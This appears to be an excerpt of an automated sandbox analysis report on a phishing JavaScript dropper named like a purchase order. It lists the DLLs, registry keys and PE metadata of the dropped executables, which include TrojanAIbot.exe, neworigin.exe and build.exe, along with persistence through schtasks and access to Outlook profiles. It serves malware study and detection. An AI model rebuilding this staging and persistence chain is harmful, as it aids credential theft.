Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: mswsock.dll
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: comsvcs.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: TrojanAIbot.exe.lnk.17.dr LNK file: ..\..\..\..\..\ACCApi\TrojanAIbot.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: RFQ -PO.20571-0001-QBMS-PRQ-0200140.js Static file information: File size 4877072 > 1048576
                                Source: Binary string: wntdll.pdbUGP source: x.exe, 00000002.00000003.1530923482.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.1530355162.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1565181805.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1565707457.0000000005050000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.1600560631.0000000003F70000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.1600415328.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000009.00000003.1640373275.0000000004030000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000009.00000003.1640053185.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 0000000D.00000003.1680596257.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, x.exe, 0000000D.00000003.1679446140.00000000039A0000.00000004.00001000.00020000.00000000.sdmp
                                Source: Binary string: wntdll.pdb source: x.exe, 00000002.00000003.1530923482.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.1530355162.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1565181805.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1565707457.0000000005050000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.1600560631.0000000003F70000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.1600415328.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000009.00000003.1640373275.0000000004030000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000009.00000003.1640053185.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 0000000D.00000003.1680596257.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, x.exe, 0000000D.00000003.1679446140.00000000039A0000.00000004.00001000.00020000.00000000.sdmp
Source: server_BTC.exe.16.dr Static PE information: 0xAA16B5AE [Fri Jun 4 22:50:22 2060 UTC]
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_0040EBD0 LoadLibraryA,GetProcAddress, 2_2_0040EBD0
Source: RFQ -PO.20571-0001-QBMS-PRQ-0200140.js String: entropy: 5.97, length: 4876722, content: "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgB
Source: server_BTC.exe.16.dr Static PE information: real checksum: 0x0 should be: 0x42478
Source: x.exe.1.dr Static PE information: real checksum: 0xa961f should be: 0x388577
Source: neworigin.exe.16.dr Static PE information: real checksum: 0x0 should be: 0x480db
Source: build.exe.16.dr Static PE information: real checksum: 0x0 should be: 0x575be
Source: TrojanAIbot.exe.17.dr Static PE information: real checksum: 0x0 should be: 0x42478
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_00416CB5 push ecx; ret 2_2_00416CC8
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_00416CB5 push ecx; ret 4_2_00416CC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00402A57 push esp; retf 16_2_00402A58
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_0040513D push 5DBA3BDAh; iretd 16_2_00405151
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00F74B64 push 00F74E86h; ret 16_2_00F74C24
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00F74B64 push 00F74E27h; ret 16_2_00F74EC9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00F97DF0 push 00F97D4Bh; ret 16_2_00F97D80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00F97DF0 push 00F97DD7h; ret 16_2_00F97D9F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00F97DF0 push 00F97D5Fh; ret 16_2_00F97DB3
